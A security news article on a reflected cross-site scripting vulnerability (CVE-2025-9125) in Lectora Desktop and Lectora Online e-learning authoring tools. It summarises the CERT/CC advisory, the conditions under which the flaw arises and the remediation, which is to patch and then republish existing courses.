The vulnerability affects Lectora Desktop (Inspire and Publisher editions) versions 21.0 through 21.3 and Lectora Online versions 7.1.6 and older, potentially exposing high-value clients such as government agencies and large enterprises to session hijacking or user redirection exploits.
The CERT Coordination Center (CERT/CC) has issued Vulnerability Note VU#780141 to raise awareness and emphasize necessary remediation steps.
Lectora, a widely adopted e-learning development tool, offers both desktop and cloud editions for creating interactive training courses.
| CVE Identifier | Affected Products | Vulnerability |
| CVE-2025-9125 | Lectora Desktop 21.0–21.3 Lectora Online ≤7.1.6 | XSS via crafted URL parameters allows JavaScript injection, leading to alert or redirect, session hijacking, or user redirection. |
When courses are published with Seamless Play Publish (SPP) enabled and Web Accessibility settings disabled, unescaped user input in URL parameters can be exploited to inject JavaScript.
In practice, an attacker could lure a legitimate user into clicking a manipulated course URL, triggering client-side script execution.
This execution could display arbitrary alerts, redirect users to malicious pages, or harvest session cookies—leading to unauthorized access to the learning platform or other connected services.
Though the underlying flaw was patched in Lectora Desktop version 21.4, released October 25, 2022, republishing of existing courses was not explicitly required in the accompanying release notes.
As a result, many courses remain vulnerable despite the availability of the patch.
Lectora Online users received the fix automatically on July 20, 2025, in version 7.1.7; however, the need to republish existing courses was clearly documented only in the online release notes.
To fully remediate the XSS vulnerability, ELB Learning advises all Lectora Desktop customers to download version 21.4 or later from the ELB Learning portal and republish any courses created with earlier software versions.
Failure to republish leaves the vulnerable JavaScript code intact in the course output, undermining the patch.
Lectora Online administrators should ensure that any content published before the July 20, 2025, automatic update is republished using the updated backend to incorporate the fix.
Course authors should also verify that Web Accessibility options are enabled when feasible, as disabling this setting contributes to the vulnerability conditions.
Where accessibility features conflict with course design requirements, authors must exercise caution and thoroughly test published content for script injection vectors.
The CERT Coordination Center published VU#780141 on September 22, 2025, to amplify awareness given the platform’s use among sensitive organizations.
The vulnerability was responsibly reported by security researcher Mohammad Jassim and documented by Laurie Tyzenhaus of CERT/CC.
ELB Learning’s public statement acknowledges the limited scope of the issue and reinforces the requirement to republish courses after applying patches, emphasizing the company’s commitment to secure authoring workflows.
Organizations using Lectora are urged to treat this notice as high priority, complete the republishing process without delay, and audit existing course inventories for compliance.
Ensuring that all training materials incorporate the patched code will safeguard users against potential XSS-driven compromises and preserve the integrity of e-learning environments.
Find this Story Interesting! Follow us on Google News, LinkedIn, and X to Get More Instant Updates
The post Lectora Desktop & Online Vulnerable to Reflected XSS via Crafted URL Parameters appeared first on Cyber Security News.
Today's links Ada Palmer's "Inventing the Renaissance": A tour-de-force, a magnum opus, a work of…
Future The People Do Not Yearn for AutomationNilay Patel | The Verge “Not everything about…
The global energy industry has long depended on seismic data to locate oil and gas…
Artificial intelligence is quietly transforming every corner of modern industry. From predictive maintenance in heavy…
Additive manufacturing has always lived in a bit of a gray area. Some see it…
The global energy industry has long depended on seismic data to locate oil and gas…
This website uses cookies.